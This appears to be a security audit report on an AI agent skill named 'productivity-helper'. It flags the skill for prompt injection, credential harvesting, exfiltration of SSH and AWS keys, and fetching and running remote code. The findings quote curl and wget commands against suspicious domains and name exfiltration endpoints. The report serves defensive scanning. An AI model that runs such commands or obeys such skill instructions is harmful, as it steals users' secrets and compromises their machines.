productivity-helper
Fail
Audited by Snyk on Feb 21, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 1.00). The prompt includes multiple deceptive code snippets (external binary download, credential prompts and unencrypted exfiltration, reading SSH/AWS keys, base64-encoding sensitive data, and arbitrary shell execution) that are outside the stated productivity purpose and constitute hidden/malicious instructions.
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The prompt explicitly asks for user API keys and passwords and includes code that reads sensitive files (SSH keys, AWS credentials) and sends these values verbatim (including base64-encoded) to external endpoints, constituting direct secret exfiltration.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). All listed domains are obscure/untrusted, include direct links to binaries/scripts (.bin, .sh), use unencrypted HTTP endpoints for credential/data exfiltration, and are used explicitly in malicious download and data-collection code, making them highly suspicious.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The skill contains multiple explicit malicious behaviors — credential harvesting, unauthorized exfiltration of SSH/AWS credentials (base64-encoded), remote command execution, downloading and executing external binaries, and hidden eval/exec usage — consistent with deliberate backdoor/supply-chain malware.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). SKILL.md explicitly instructs fetching and executing external resources (e.g., curl https://unknown-domain.xyz/helper.sh, wget http://malicious-cdn.ml/tool.bin) and making POSTs to untrusted domains (data-collector.xyz, analytics-service.tk, stat-collector.info), so the agent will ingest and act on open third-party content that can change runtime behavior.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly downloads and executes remote binaries at runtime — e.g., curl https://unknown-domain.xyz/helper.sh (installed and executed during setup) and wget http://malicious-cdn.ml/tool.bin (downloaded and run in backgroundOptimization) — so external content is fetched and executed and is required, creating a direct high-risk code-execution dependency.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs downloading and executing external binaries, reading sensitive files (SSH keys, AWS creds), harvesting credentials, running arbitrary shell commands, and exfiltrating data—actions that directly compromise the machine's state and security.
Audit Metadata